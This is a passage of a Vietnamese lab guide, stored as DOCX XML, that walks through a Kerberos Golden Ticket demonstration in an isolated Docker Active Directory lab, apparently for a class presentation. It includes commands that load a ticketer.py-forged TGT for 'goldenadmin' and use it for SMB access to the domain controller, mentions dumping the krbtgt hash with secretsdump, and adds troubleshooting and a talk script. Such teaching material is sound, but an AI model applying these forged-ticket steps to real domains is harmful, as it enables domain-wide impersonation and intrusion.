                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Realm/domain FQDN; ở đây LAB.KERB.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>goldenadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Principal được ghi vào ticket giả.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10080"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10080"/>
            <w:shd w:fill="FCE4D6"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Điểm cần nói: </w:t>
            </w:r>
            <w:r>
              <w:t>Ticket được tạo offline từ thông tin đã biết; theo tài liệu ticketer.py, khi tạo Golden Ticket kiểu này không cần gửi yêu cầu tới KDC để tạo ticket.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>15. Nạp và kiểm tra ticket giả</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>export KRB5CCNAME=/root/goldenadmin.ccache</w:t>
        <w:br/>
        <w:t>ls -lh "$KRB5CCNAME"</w:t>
        <w:br/>
        <w:t>klist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Nếu attacker image thiếu klist:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>apt-get update</w:t>
        <w:br/>
        <w:t>apt-get install -y krb5-user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Sau đó đặt /etc/krb5.conf giống client. Việc kiểm tra quan trọng là file CCACHE tồn tại và KRB5CCNAME trỏ đúng file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>16. Dùng ticket giả để thử xác thực SMB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>export KRB5CCNAME=/root/goldenadmin.ccache</w:t>
        <w:br/>
        <w:t>smbclient.py -k -no-pass 'LAB.KERB/goldenadmin@dc01.lab.kerb'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Nếu attacker image có Samba client, có thể thử:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>smbclient -L //dc01.lab.kerb -k -N</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10080"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10080"/>
            <w:shd w:fill="FFF2CC"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Nếu bị từ chối: </w:t>
            </w:r>
            <w:r>
              <w:t>Kiểm tra lần lượt: Domain SID, krbtgt NTHASH, realm LAB.KERB, DNS dc01.lab.kerb, clock skew và KRB5CCNAME. Không mở thêm cổng ra host để 'chữa' lỗi.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>17. So sánh Kerberos bình thường và Gold Ticket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Bước</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:shd w:fill="D9EAF7"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kerberos bình thường</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:shd w:fill="D9EAF7"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Gold Ticket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Xác thực ban đầu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Alice dùng password với KDC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ticket được tạo offline sau khi có bí mật krbtgt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>TGT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KDC cấp TGT cho Alice.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Attacker tự tạo forged TGT.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Danh tính</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Danh tính thật trong AD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Danh tính ghi trong ticket có thể do attacker chọn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Điều kiện cốt lõi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Credential của user.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Bí mật krbtgt + Domain SID.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CCACHE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cache chứa ticket KDC cấp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cache chứa ticket do ticketer.py tạo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ý nghĩa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SSO Kerberos bình thường.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Mô phỏng hậu quả khi khóa tin cậy của domain bị lộ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>18. Các điểm nên giải thích khi thuyết trình</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tại sao cần krbtgt? </w:t>
      </w:r>
      <w:r>
        <w:t>Đây là tài khoản đặc biệt trong AD/Kerberos; bí mật của nó đóng vai trò quan trọng trong việc tạo và kiểm chứng TGT.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tại sao cần Domain SID? </w:t>
      </w:r>
      <w:r>
        <w:t>Ticket AD chứa thông tin nhận diện domain/PAC; ticketer.py dùng Domain SID để xây dựng ticket phù hợp với domain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tại sao Gold Ticket đáng chú ý? </w:t>
      </w:r>
      <w:r>
        <w:t>Khi bí mật krbtgt bị lộ, attacker có thể tạo TGT giả mà không cần xác thực từng danh tính theo luồng bình thường.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Docker có làm Kerberos khác bản chất không? </w:t>
      </w:r>
      <w:r>
        <w:t>Không. Docker chỉ thay lớp máy ảo bằng container; KDC, DNS, realm, ticket và kiểm tra thời gian vẫn là các thành phần Kerberos/AD.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tại sao DNS quan trọng? </w:t>
      </w:r>
      <w:r>
        <w:t>AD/Kerberos dùng hostname và bản ghi DNS/SRV để tìm dịch vụ/KDC; dùng IP sai chỗ có thể làm Kerberos thất bại.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tại sao thời gian quan trọng? </w:t>
      </w:r>
      <w:r>
        <w:t>Kerberos kiểm tra timestamp; clock skew lớn có thể khiến ticket bị từ chối.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>19.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Lỗi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:shd w:fill="D9EAF7"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Nguyên nhân thường gặp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:shd w:fill="D9EAF7"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Xử lý</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>kinit: Cannot contact any KDC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DNS/KDC sai hoặc DC chưa sẵn sàng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>nslookup; kiểm tra docker compose logs dc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Clock skew too great</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Giờ client/DC lệch.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>date trên cả hai; kiểm tra Docker/host time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Server not found in Kerberos database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hostname/SPN không khớp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Dùng dc01.lab.kerb, không thay bằng IP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>klist không có ticket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>kinit chưa thành công/cache sai.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>kdestroy rồi kinit lại.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>smbclient hỏi password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Không dùng Kerberos/ccache sai.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Dùng -k -N; kiểm tra KRB5CCNAME.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>secretsdump không tìm thấy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Impacket chưa cài/PATH.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ticketer.py -h; secretsdump.py -h; pip show impacket.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Forged ticket bị từ chối</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Sai hash/SID/realm/hostname/clock.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kiểm tra từng giá trị và tạo ticket lại.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>docker compose build lỗi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Docker/package mirror.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>docker pull image; kiểm tra Docker Desktop.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>20. Quan sát và chụp bằng chứng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>docker compose ps</w:t>
        <w:br/>
        <w:t>docker compose logs dc --tail=200</w:t>
        <w:br/>
        <w:t>docker stats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Client:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>klist</w:t>
        <w:br/>
        <w:t>smbclient -L //dc01.lab.kerb -k -N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Attacker:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>echo $KRB5CCNAME</w:t>
        <w:br/>
        <w:t>ls -lh "$KRB5CCNAME"</w:t>
        <w:br/>
        <w:t>klist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Nên chụp: Docker Desktop/compose ps; DNS SRV; klist của Alice; Domain SID; dòng krbtgt trong secretsdump; ticketer.py tạo CCACHE; và lần truy cập SMB bằng ticket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>21. Dọn lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t># Giữ dữ liệu để lần sau chạy tiếp</w:t>
        <w:br/>
        <w:t>docker compose stop</w:t>
        <w:br/>
        <w:br/>
        <w:t># Reset hoàn toàn domain/volumes</w:t>
        <w:br/>
        <w:t>docker compose down -v</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10080"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10080"/>
            <w:shd w:fill="FCE4D6"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Cẩn thận: </w:t>
            </w:r>
            <w:r>
              <w:t>down -v xóa database AD của lab. Chỉ chạy trong đúng thư mục kerberos-docker-lab.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>22. Checklist trước buổi demo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ Docker Engine Running</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ docker compose config không lỗi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ 3 container Up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ dc01.lab.kerb → 172.28.0.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ SRV _kerberos._tcp.lab.kerb hoạt động</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ kinit alice@LAB.KERB thành công</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ klist hiển thị krbtgt/LAB.KERB@LAB.KERB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ SMB Kerberos bình thường hoạt động</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ Có Domain SID thật</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ Có krbtgt NTHASH chỉ của lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ ticketer.py tạo goldenadmin.ccache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ KRB5CCNAME trỏ đúng ticket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ Có bằng chứng xác thực bằng ticket giả</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ Sau demo reset lab nếu cần</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>23. Kịch bản nói 5–7 phút</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1) Docker thay VM: ba container nằm trong một mạng riêng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2) DC cung cấp AD + DNS + Kerberos KDC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3) Alice chạy kinit → KDC cấp TGT; klist cho thấy ticket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4) Alice dùng Kerberos để truy cập SMB mà không nhập password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>5) Giải thích điều kiện Gold Ticket: bí mật krbtgt + Domain SID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>6) Attacker container mô phỏng việc bí mật krbtgt đã bị lộ trong lab.</w:t>
      </w:r>
    </w:p>
